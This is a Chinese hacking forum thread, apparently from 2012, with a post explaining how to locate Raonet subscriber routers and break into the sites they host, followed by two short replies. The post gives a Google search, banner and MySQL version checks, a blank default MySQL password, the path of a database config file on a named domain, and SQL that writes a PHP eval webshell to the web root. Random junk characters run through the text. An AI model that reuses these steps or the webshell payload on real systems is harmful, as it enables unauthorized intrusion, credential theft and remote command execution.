找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3021|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:- g$ D$ Y2 h, L, ?( i1 ~: T3 [) R

) }7 B+ e" L0 c, P: u4 j1:google搜索'Raonet Subscriber Ethernet Router'
; B6 A6 c: i# c2 L: E0 `2 R/ v% H/ N' T& X$ R2 X
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 i0 `# f/ V4 \  i% N0 W. \/ H
; b7 P2 O% F7 m' G9 o& T
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) r  w: V) o- J/ ]5 X

5 n$ u% s  m* t3 Q+ x" @5 J//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......; v6 _- I# O+ D3 a/ c$ h) M

6 \( |- O# ^0 [ : s+ R) T& u+ P
8 ^) v+ P( _$ i: g, E
入侵步骤:+ F4 j5 x9 l( f& W, i

  }1 c  j6 `; j9 n4 R% n$ F1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
+ k8 Z! A  W* Y* t! N$ g, P. O, a5 [) S! ~: g9 z* Q
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
6 m+ t( U4 n$ v) e3:得到密码后连接,查看GUI管理密码:( h9 p* ?: e0 G- v
use ser_500
0 g- k# E- }& O9 Iselect id,passwd from user;
- o% L; \; [- W, F4:通过数据库写入webshell,执行命令:( m$ }- e" c: d6 f6 }1 L/ {+ u& f
use mysql;9 M2 g, I# t& X5 O! W
create table ok(cmd TEXT);% Z9 r$ ~# Y# r' D! b1 M9 u& y
insert into ok values("<?php @eval($_POST[cmd])?>");8 L% d- U" ?) h" k- C5 T
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
3 t9 B$ ^3 O6 v4 \0 H! ndrop table ok;5 k0 c& P4 b# \8 E$ r% ~$ E8 q

# c" r2 ]3 s: c0 z& G( ^5:连接后门shell.php
" U' s" g6 T; \  v# G0 {# m$ r" G4 o
6. 搞定!% Q. V/ g4 ?! |7 N) M9 _& a+ K* Q

9 n( j0 y6 v$ p7 S/ F4 p! C- }
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表